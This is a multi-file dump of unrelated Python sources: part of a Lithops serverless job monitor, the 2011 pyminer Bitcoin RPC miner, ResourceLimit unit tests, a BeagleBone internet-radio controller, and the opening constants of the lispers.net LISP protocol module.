        # update job with new extended runtime name
        self.runtime_name = ext_runtime_name

        runtime_key = self.compute_handler.get_runtime_key(self.runtime_name, runtime_memory)
        runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)

        if not runtime_meta:
            timeout = self.config['serverless']['runtime_timeout']
            logger.debug('Creating runtime: {}, memory: {}MB'.format(ext_runtime_name, runtime_memory))

            # directory where the job's code was staged ("temorary" sic)
            runtime_temorary_directory = '/'.join([LITHOPS_TEMP_DIR, os.path.dirname(job.func_key)])
            modules_path = '/'.join([runtime_temorary_directory, 'modules'])

            ext_docker_file = '/'.join([runtime_temorary_directory, "Dockerfile"])

            # Generate Dockerfile extended with function dependencies and function
            with open(ext_docker_file, 'w') as df:
                df.write('\n'.join([
                    'FROM {}'.format(base_docker_image),
                    'ENV PYTHONPATH={}:${}'.format(modules_path, 'PYTHONPATH'),
                    # set python path to point to dependencies folder
                    'COPY . {}'.format(runtime_temorary_directory)
                ]))

            # Build new extended runtime tagged by function hash
            cwd = os.getcwd()
            os.chdir(runtime_temorary_directory)
            self.compute_handler.build_runtime(ext_runtime_name, ext_docker_file)
            os.chdir(cwd)

            runtime_meta = self.compute_handler.create_runtime(ext_runtime_name, runtime_memory, timeout=timeout)
            self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
        else:
            if not self.log_active:
                print()

        # Refuse to run against a runtime built for a different Python version
        py_local_version = version_str(sys.version_info)
        py_remote_version = runtime_meta['python_ver']

        if py_local_version != py_remote_version:
            raise Exception(("The indicated runtime '{}' is running Python {} and it "
                             "is not compatible with the local Python version {}")
                            .format(self.runtime_name, py_remote_version, py_local_version))

        return runtime_meta
class JobMonitor:
    """Tracks call completion per job and feeds one token per finished call
    into the invoker's token bucket queue.

    Completion events come either from polling object storage or from
    RabbitMQ messages, depending on configuration.
    """

    def __init__(self, lithops_config, internal_storage, token_bucket_q):
        """
        :param lithops_config: full lithops configuration dict
        :param internal_storage: storage client used to poll job status
        :param token_bucket_q: queue receiving one '#' per finished call
        """
        self.config = lithops_config
        self.internal_storage = internal_storage
        self.token_bucket_q = token_bucket_q
        self.is_lithops_worker = is_lithops_worker()
        # job_key -> {'thread': Thread, 'should_run': bool}
        self.monitors = {}

        self.rabbitmq_monitor = self.config['lithops'].get('rabbitmq_monitor', False)
        if self.rabbitmq_monitor:
            self.rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')

    def stop(self):
        # Signal every monitoring thread to finish; threads exit lazily.
        for job_key in self.monitors:
            self.monitors[job_key]['should_run'] = False

    def get_active_jobs(self):
        """Return the number of jobs whose monitoring thread is still alive."""
        active_jobs = 0
        for job_key in self.monitors:
            if self.monitors[job_key]['thread'].is_alive():
                active_jobs += 1
        return active_jobs

    def start_job_monitoring(self, job):
        """Spawn the monitoring thread (storage- or rabbitmq-based) for job."""
        logger.debug('ExecutorID {} | JobID {} - Starting job monitoring'
                     .format(job.executor_id, job.job_id))
        if self.rabbitmq_monitor:
            th = Thread(target=self._job_monitoring_rabbitmq, args=(job,))
        else:
            th = Thread(target=self._job_monitoring_os, args=(job,))
        if not self.is_lithops_worker:
            # daemonize only on the client; inside a lithops worker the
            # thread must keep the process alive until monitoring finishes
            th.daemon = True

        job_key = create_job_key(job.executor_id, job.job_id)
        self.monitors[job_key] = {'thread': th, 'should_run': True}
        th.start()

    def _job_monitoring_os(self, job):
        """Poll object storage once per second and emit one token per newly
        finished call until all calls are done or stop() was requested."""
        total_callids_done = 0
        job_key = create_job_key(job.executor_id, job.job_id)

        while self.monitors[job_key]['should_run'] and total_callids_done < job.total_calls:
            time.sleep(1)
            callids_running, callids_done = self.internal_storage.get_job_status(job.executor_id, job.job_id)
            # only calls finished since the previous poll produce tokens
            total_new_tokens = len(callids_done) - total_callids_done
            total_callids_done = total_callids_done + total_new_tokens
            for i in range(total_new_tokens):
                if self.monitors[job_key]['should_run']:
                    self.token_bucket_q.put('#')
                else:
                    break

        logger.debug('ExecutorID {} | JobID {} - Job monitoring finished'
                     .format(job.executor_id, job.job_id))

    def _job_monitoring_rabbitmq(self, job):
        """Consume per-call status messages from RabbitMQ, emitting one token
        per '__end__' message until all calls are done or stop() was requested."""
        total_callids_done = 0
        job_key = create_job_key(job.executor_id, job.job_id)

        exchange = 'lithops-{}'.format(job_key)
        queue_1 = '{}-1'.format(exchange)

        params = pika.URLParameters(self.rabbit_amqp_url)
        connection = pika.BlockingConnection(params)
        channel = connection.channel()

        def callback(ch, method, properties, body):
            nonlocal total_callids_done
            call_status = json.loads(body.decode("utf-8"))
            if call_status['type'] == '__end__':
                if self.monitors[job_key]['should_run']:
                    self.token_bucket_q.put('#')
                total_callids_done += 1
            if total_callids_done == job.total_calls or \
               not self.monitors[job_key]['should_run']:
                ch.stop_consuming()

        # NOTE(review): positional-callback basic_consume with the no_ack
        # keyword matches pika < 1.0; pika >= 1.0 renamed both — confirm the
        # pinned pika version.
        channel.basic_consume(callback, queue=queue_1, no_ack=True)
        channel.start_consuming()
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a bitcoind node over HTTP (Python 2)."""

    # class-level seed for request ids; the += in rpc() creates a
    # per-instance counter that shadows this class attribute
    OBJID = 1

    def __init__(self, host, port, username, password):
        # HTTP basic auth header built from the RPC credentials
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # non-strict connection, 30 second timeout
        self.conn = httplib.HTTPConnection(host, port, False, 30)
    def rpc(self, method, params=None):
        """Issue one JSON-RPC call; return the result value, the error
        object, or None on transport/decode failure.

        NOTE(review): returning the 'error' dict instead of raising means
        callers cannot distinguish an error reply from a dict result.
        """
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })

        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None

        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None

        return resp_obj['result']
    def getblockcount(self):
        # convenience wrapper for the 'getblockcount' RPC
        return self.rpc('getblockcount')
    def getwork(self, data=None):
        # 'getwork' RPC: no data fetches work, with data submits a solution
        return self.rpc('getwork', data)
def uint32(x):
    """Truncate an integer to its low 32 bits (unsigned semantics)."""
    return 0xffffffff & x
def bytereverse(x):
    """Byte-swap a 32-bit word (flip its endianness)."""
    low_to_high = (x << 24) | ((x << 8) & 0x00ff0000)
    high_to_low = ((x >> 8) & 0x0000ff00) | (x >> 24)
    return (low_to_high | high_to_low) & 0xffffffff
def bufreverse(in_buf):
    """Byte-swap every aligned 32-bit word of in_buf.

    Operates on Python 2 byte strings; len(in_buf) is assumed to be a
    multiple of 4 (callers pass 80-byte headers and 32-byte hashes).
    """
    out_words = []
    for i in range(0, len(in_buf), 4):
        # '@I' = native-endian unsigned 32-bit word
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    """Reverse the order of the 4-byte words in a buffer (word order flip,
    bytes within each word untouched)."""
    chunks = [in_buf[off:off + 4] for off in range(0, len(in_buf), 4)]
    return ''.join(reversed(chunks))
class Miner:
    """Single-process getwork miner: scans nonces over double-SHA256 block
    headers and submits any proof-of-work solution upstream (Python 2)."""

    def __init__(self, id):
        # worker id, used only in hashmeter output
        self.id = id
        # nonces to scan per getwork round; retuned each round by iterate()
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for a share below target.

        :param datastr: hex-encoded 128-byte getwork data block
        :param targetstr: hex-encoded 256-bit target (little-endian)
        :return: (hashes_done, nonce_bin) where nonce_bin is the packed
                 winning nonce or None if the scan range was exhausted
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)

        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]

        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)

        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)

        for nonce in xrange(self.max_nonce):

            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)

            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()

            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()

            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue

            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)

            hash_str = hash.encode('hex')
            l = long(hash_str, 16)

            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
            # return (nonce + 1, nonce_bin)

        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the getwork data and submit it."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # the nonce occupies hex characters 152-160 of the data block
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One mining round: fetch work, scan nonces, retune max_nonce to
        roughly settings['scantime'] seconds, submit any solution found."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return

        time_start = time.time()

        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])

        time_end = time.time()
        time_diff = time_end - time_start

        # scale the next scan so one round lasts ~scantime seconds
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL

        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)

        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Connect to the RPC server and iterate mining rounds forever."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                         settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return

        while True:
            self.iterate(rpc)
def miner_thread(id):
    # Worker-process entry point: build a Miner and mine indefinitely.
    Miner(id).loop()
if __name__ == '__main__':
    # usage: pyminer.py CONFIG-FILE
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # read the config file: '#' lines are comments, the rest key=value
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue

        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # defaults for any optional setting the config omitted
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 37983
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # normalize numeric settings parsed from text
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # one mining Process per configured "thread"
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"

    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        # block until the workers exit (they normally never do)
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_resource.py | import resource
from multiprocessing import Manager, Process
import pytest
from pji.control.model import ResourceLimit
@pytest.mark.unittest
class TestControlModelResource:
    """Unit tests for pji.control.model.ResourceLimit."""

    def test_properties(self):
        # every constructor argument is exposed as a same-named property
        rl = ResourceLimit(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        )
        assert rl.max_stack == 1
        assert rl.max_memory == 2
        assert rl.max_cpu_time == 3
        assert rl.max_real_time == 4
        assert rl.max_output_size == 5
        assert rl.max_process_number == 6

    def test_load_from_json(self):
        # construction from a plain dict mirrors keyword construction
        rl = ResourceLimit.load_from_json(dict(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        ))
        assert rl.max_stack == 1
        assert rl.max_memory == 2
        assert rl.max_cpu_time == 3
        assert rl.max_real_time == 4
        assert rl.max_output_size == 5
        assert rl.max_process_number == 6

    def test_to_json(self):
        # .json round-trips the constructor arguments
        rl = ResourceLimit(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        )
        assert rl.json == dict(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        )

    def test_repr(self):
        # repr only mentions the limits that are actually set
        assert repr(ResourceLimit()) == '<ResourceLimit>'
        assert repr(ResourceLimit(max_real_time=2.3)) == '<ResourceLimit real time: 2.300s>'
        assert repr(ResourceLimit(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        )) == '<ResourceLimit cpu time: 3.000s, real time: 4.000s, memory: 2.0 Byte, ' \
              'stack: 1.0 Byte, process: 6, output size: 5.0 Byte>'

    def test_eq(self):
        # equality is structural; comparison with non-ResourceLimit is False
        rl = ResourceLimit(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        )
        assert rl == rl
        assert ResourceLimit.merge(
            ResourceLimit(max_memory=2),
            ResourceLimit(max_cpu_time=3),
        ) == ResourceLimit(
            max_memory=2,
            max_cpu_time=3,
        )
        assert not (rl == 1)

    def test_hash(self):
        # equal limits hash equally and are usable as dict keys
        h = {
            ResourceLimit(
                max_memory=2,
                max_cpu_time=3,
            ): 1,
            ResourceLimit(
                max_stack=1,
                max_memory=2,
                max_cpu_time=3,
                max_real_time=4,
                max_output_size=5,
                max_process_number=6,
            ): 2,
        }
        assert h[ResourceLimit(
            max_memory=2,
            max_cpu_time=3,
        )] == 1
        assert h[ResourceLimit(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        )] == 2

    def test_merge(self):
        # merge keeps each field's most restrictive (smallest) set value
        assert ResourceLimit.merge(
            ResourceLimit(max_memory=2),
            ResourceLimit(max_cpu_time=3),
        ).json == dict(
            max_output_size=None,
            max_real_time=None,
            max_stack=None,
            max_process_number=None,
            max_memory=2,
            max_cpu_time=3,
        )
        assert ResourceLimit.merge(ResourceLimit(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=4,
            max_output_size=5,
            max_process_number=6,
        ), ResourceLimit(
            max_stack=6,
            max_memory=5,
            max_cpu_time=4,
            max_real_time=3,
            max_output_size=2,
            max_process_number=1,
        )).json == dict(
            max_stack=1,
            max_memory=2,
            max_cpu_time=3,
            max_real_time=3,
            max_output_size=2,
            max_process_number=1,
        )

    def test_apply_1(self):
        # apply() is executed in a child process so the rlimits do not
        # affect the test runner itself; results come back via a Manager dict
        with Manager() as manager:
            _result = manager.dict(dict(
                max_cpu_time=None,
                max_memory=None,
                max_stack=None,
                max_output_size=None,
                max_process_number=None,
            ))

            # noinspection PyTypeChecker,DuplicatedCode
            def _get_user_and_group():
                rl = ResourceLimit(
                    max_cpu_time='5s',
                    max_memory='512mb',
                    max_stack='1G',
                    max_output_size='64m',
                    max_process_number=3,
                )
                rl.apply()
                _result['max_cpu_time'] = resource.getrlimit(resource.RLIMIT_CPU)
                _result['max_memory'] = resource.getrlimit(resource.RLIMIT_AS)
                _result['max_stack'] = resource.getrlimit(resource.RLIMIT_STACK)
                _result['max_output_size'] = resource.getrlimit(resource.RLIMIT_FSIZE)
                _result['max_process_number'] = resource.getrlimit(resource.RLIMIT_NPROC)

            p = Process(target=_get_user_and_group)
            p.start()
            p.join()

            _result = dict(_result)
            # NOTE(review): the expected values encode ResourceLimit's unit
            # conversions (e.g. '5s' -> (6, 6) CPU seconds, '512mb' ->
            # 780435456 bytes of address space) — confirm against the
            # implementation if these change.
            assert _result == dict(
                max_cpu_time=(6, 6),
                max_memory=(780435456, 780435456),
                max_stack=(1000000000, 1000000000),
                max_output_size=(64000000, 64000000),
                max_process_number=(3, 3),
            )

    def test_apply_2(self):
        # an empty ResourceLimit leaves every rlimit unlimited (-1, -1)
        with Manager() as manager:
            _result = manager.dict(dict(
                max_cpu_time=None,
                max_memory=None,
                max_stack=None,
                max_output_size=None,
            ))

            # noinspection PyTypeChecker,DuplicatedCode
            def _get_user_and_group():
                rl = ResourceLimit()
                rl.apply()
                _result['max_cpu_time'] = resource.getrlimit(resource.RLIMIT_CPU)
                _result['max_memory'] = resource.getrlimit(resource.RLIMIT_AS)
                _result['max_stack'] = resource.getrlimit(resource.RLIMIT_STACK)
                _result['max_output_size'] = resource.getrlimit(resource.RLIMIT_FSIZE)

            p = Process(target=_get_user_and_group)
            p.start()
            p.join()

            _result = dict(_result)
            assert _result == dict(
                max_cpu_time=(-1, -1),
                max_memory=(-1, -1),
                max_stack=(-1, -1),
                max_output_size=(-1, -1),
            )
|
testmp.py | import os
import subprocess
import time
import sys
import re
import lcd
import threading
import Adafruit_BBIO.GPIO as GPIO
# Station name -> stream/playlist URL map for mplayer
stations={'JAZZ': 'http://www.radioswissjazz.ch/live/aacp.m3u', 'Virgin Radio': 'http://shoutcast.unitedradio.it:1301','Deejay': 'http://mp3.kataweb.it:8000/RadioDeejay','105Hits': 'http://shoutcast.unitedradio.it:1109/listen.pls'}
volume = 25 #default volume value for mplayer
streamTitle=""  # last ICY stream title parsed from mplayer output
pause = 0  # playback paused flag, toggled by button 3
lines = ["", "", "", ""]  # shadow copy of the four LCD lines

# Pin setup: the four push buttons are configured as inputs
GPIO.setup("P9_21", GPIO.IN)
GPIO.setup("P9_22", GPIO.IN)
GPIO.setup("P9_23", GPIO.IN)
GPIO.setup("P9_24", GPIO.IN)

#p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-quiet", "-slave", "http://shoutcast.unitedradio.it:1301"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-slave", "-playlist", "http://www.radioswissjazz.ch/live/aacp.m3u"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
#p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-slave", "-mixer-channel", "-playlist", stations['JAZZ']], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Start mplayer in slave mode so it can be driven via stdin commands
p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-slave", "-playlist", stations['JAZZ']], stdin=subprocess.PIPE, stdout=subprocess.PIPE)

# set the lcd up
lcd.setup()
lcd.init()

# to be called as a new thread
#def waitCmd():

# to be called as a new thread
def streamAnalysis():
    """Reader thread: scan mplayer stdout for ICY metadata lines and
    publish the current title through the global streamTitle."""
    global streamTitle
    print "[DEBUG] Thread analysis"
    for line in p.stdout:
        if line.startswith("ICY Info"):
            info = line.split(':', 1)[1].strip()
            # ICY metadata arrives as key='value' pairs
            attr = dict(re.findall("(\w+)='([^']*)'", info))
            print '[DEBUG] Stream title: '+ attr.get('StreamTitle', '(none)')
            #streamTitle = '[DEBUG] Stream title: '+ attr.get('StreamTitle', '(none)')
            streamTitle = attr.get('StreamTitle', '(none)')
            print streamTitle
# Greet on LCD line 1 and console, then start the metadata reader thread
lcd.writeln(1, "Welcome!")
print "Welcome!"
t = threading.Thread(target=streamAnalysis)
t.start()
"""
for line in p.stdout:
    if line.startswith("ICY Info"):
        info = line.split(':', 1)[1].strip()
        attr = dict(re.findall("(\w+)='([^']*)'", info))
        print '[DEBUG] Stream title: '+ attr.get('StreamTitle', '(none)')
"""
#out, err = p.communicate()
#------Mario 08/02/2014: removed the 5-second pause to experiment with volume control
#time.sleep(5)
#p.stdin.write('pause\n') #works
#subprocess.Popen(["echo","'pause\n'"], shell=True, stdin=subprocess.PIPE).stdin
#sys.stdin = sys.stdout
#print "prima pausa"
#sys.stdout.write("pause\n")
#time.sleep(5)
#p.stdin.write('pause\n') #works, resumes playback
#print "play di nuovo"
#sys.stdout.write("pause\n")
sys.stdin = sys.__stdin__ #restore original stdin
#print "[INFO] Versione DEMO: solo 15 secondi di radio..."
#time.sleep(15)
#p.kill()
def function1():
    """Button 1 handler: raise mplayer volume by 5% (capped at 100)."""
    print "Run function 1"
    global volume, pause
    volume = volume + 5
    if (volume > 100):
        volume = 100
    string = "set_property volume %d\n" %(volume)
    print "Setting volume: %d\n" %(volume)
    #p.stdin.write('set_property volume 10\n')
    p.stdin.write(string)  # mplayer slave-mode command
    # flash the new volume on LCD line 4 for 0.4s, then clear it
    lines[3]="Volume: " + str(volume) + "%"
    time.sleep(0.4)
    lines[3] = ""
def function2():
    """Button 2 handler: lower mplayer volume by 5% (floored at 0)."""
    print "Run function 2"
    global volume, pause
    volume = volume - 5
    if (volume < 0):
        volume = 0
    print "Setting volume: %d\n" %(volume)
    string = 'set_property volume %d\n' %(volume)
    p.stdin.write(string)  # mplayer slave-mode command
    #p.stdin.write('set_property volume 40\n')
    # flash the new volume on LCD line 4 for 0.4s, then clear it
    lines[3]="Volume: " + str(volume) + "%"
    time.sleep(0.4)
    lines[3] = ""
def function3():
    """Button 3 handler: toggle play/pause (mplayer 'pause' toggles both
    ways) and mirror the state on LCD line 4."""
    global pause
    print "Run function 3"
    if pause==False:
        p.stdin.write('pause\n')
        lines[3]="**PAUSE**"
        #lcd.writeln(4, "**PAUSE**")
        pause = True
    else:
        p.stdin.write('pause\n')
        lines[3]=""
        #lcd.writeln(4, "") # clear line 4
        pause = False
def function4():
    """Button 4 handler: print the current stream title to the console
    (the LCD write is handled by updateLCD)."""
    global streamTitle
    print "Run function 4"
    print streamTitle
    #lcd.writeln(2, streamTitle[0:20])
def updateLCD():
    """LCD refresh loop (runs in its own thread): mirrors the current
    stream title onto line 2 and the status text onto line 4.

    NOTE(review): the time.sleep(1) is commented out, so this loop
    busy-spins and rewrites the LCD continuously — confirm this is
    intentional.
    """
    global lines
    global streamTitle
    while(1):
        lines[1] = streamTitle
        lcd.writeln(2, lines[1][0:20])  # LCD is 20 characters wide
        lcd.writeln(4, lines[3])
        #lcd.writeln(2, streamTitle[0:20])
        #time.sleep(1)
def inputButtons():
    """Button polling loop (runs in its own thread).

    Buttons are active-low: a 1 -> 0 transition fires the matching
    functionN() handler; the 0.1s sleep acts as a crude debounce.
    """
    old_switch_state1 = 1
    old_switch_state2 = 1
    old_switch_state3 = 1
    old_switch_state4 = 1
    print "***** Benvenuto nel Thread BUTTON ******"
    while(1):
        new_switch_state1 = GPIO.input("P9_21")
        if new_switch_state1 == 0 and old_switch_state1 == 1 :
            print('Do not press this button 1 again!')
            function1()
            time.sleep(0.1)
        old_switch_state1 = new_switch_state1

        new_switch_state2 = GPIO.input("P9_22")
        if new_switch_state2 == 0 and old_switch_state2 == 1 :
            print('Do not press this button 2 again!')
            function2()
            time.sleep(0.1)
        old_switch_state2 = new_switch_state2

        new_switch_state3 = GPIO.input("P9_23")
        if new_switch_state3 == 0 and old_switch_state3 == 1 :
            print('Do not press this button 3 again!')
            function3()
            time.sleep(0.1)
        old_switch_state3 = new_switch_state3

        new_switch_state4 = GPIO.input("P9_24")
        if new_switch_state4 == 0 and old_switch_state4 == 1 :
            print('Do not press this button 4 again!')
            function4()
            time.sleep(0.1)
        old_switch_state4 = new_switch_state4

    #if not GPIO.input("P9_21"): function1()
    #if not GPIO.input("P9_22"): function2()
    #if not GPIO.input("P9_23"): function3()
    #if not GPIO.input("P9_24"): function4()
def inputButton1():
    """Poll button 1 only (unused single-button variant of inputButtons)."""
    old_switch_state = 1
    print "***** Benvenuto nel Thread BUTTON ******"
    while(1):
        new_switch_state = GPIO.input("P9_21")
        if new_switch_state == 0 and old_switch_state == 1 :
            print('Do not press this button 1 again!')
            time.sleep(0.1)
        old_switch_state = new_switch_state

    #if not GPIO.input("P9_21"): function1()
    #if not GPIO.input("P9_22"): function2()
    #if not GPIO.input("P9_23"): function3()
    #if not GPIO.input("P9_24"): function4()
def inputButton2():
    """Poll button 2 only (unused single-button variant of inputButtons)."""
    old_switch_state = 1
    print "***** Benvenuto nel Thread BUTTON ******"
    while(1):
        new_switch_state = GPIO.input("P9_22")
        if new_switch_state == 0 and old_switch_state == 1 :
            print('Do not press this button 2 again!')
            time.sleep(0.1)
        old_switch_state = new_switch_state
def inputButton3():
    """Poll button 3 only (unused single-button variant of inputButtons)."""
    old_switch_state = 1
    print "***** Benvenuto nel Thread BUTTON ******"
    while(1):
        new_switch_state = GPIO.input("P9_23")
        if new_switch_state == 0 and old_switch_state == 1 :
            print('Do not press this button 3 again!')
            time.sleep(0.1)
        old_switch_state = new_switch_state
def inputButton4():
    """Poll button 4 only (unused single-button variant of inputButtons)."""
    old_switch_state = 1
    print "***** Benvenuto nel Thread BUTTON ******"
    while(1):
        new_switch_state = GPIO.input("P9_24")
        if new_switch_state == 0 and old_switch_state == 1 :
            print('Do not press this button 4 again!')
            time.sleep(0.1)
        old_switch_state = new_switch_state
# Start the LCD refresh thread
t2 = threading.Thread(target=updateLCD)
t2.start()
#inputBtn1 = threading.Thread(target=inputButton1)
#inputBtn1.start()
#inputBtn2 = threading.Thread(target=inputButton2)
#inputBtn2.start()
#inputBtn3 = threading.Thread(target=inputButton3)
#inputBtn3.start()
#inputBtn4 = threading.Thread(target=inputButton4)
#inputBtn4.start()
# Start the single polling thread that watches all four buttons
inputBtns = threading.Thread(target=inputButtons)
inputBtns.start()

# read event streaming
#evt_file = open("/dev/input/event1", "rb")
# Keep the main thread alive; all work happens in the worker threads
while(1): time.sleep(1)
#lcd.writeln(2, streamTitle[0:20])
#evt = evt_file.read(16) # Read the event
#evt_file.read(16) # Discard the debounce event
#code = ord(evt[10])
#print "Button "+str(code)+" pressed with direction "+str(ord(evt[12]))
#if str(code)=='1' and str(ord(evt[12]))=='1': function1()
#elif str(code)=='2' and str(ord(evt[12]))=='1': function2()
#elif str(code)=='3' and str(ord(evt[12]))=='1': function3()
#elif str(code)=='4' and str(ord(evt[12]))=='1': function4()
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
#
# Module-wide state and protocol constants for the lispers.net LISP
# implementation (RFC 6830). These names are read and written by the
# itr/etr/rtr/mr/ms/ddt/core components. The dead obfuscation filler
# statements ("if N - N: ...") that previously surrounded these
# assignments were no-ops (always-false conditions) and have been removed.
#

#
# Optional cipher selection, chosen via environment variables at startup.
#
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)

# Debug switch: dump the RLOC-probe list when enabled.
lisp_print_rloc_probe_list = False

#
# Identity of this process: hostname, software version, uptime, and which
# LISP component role(s) this process plays (set by lisp_i_am()).
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True

#
# Control-plane tables: pending Map-Notifies, configured map-servers,
# queued DDT map-requests, local database-mappings, group mappings,
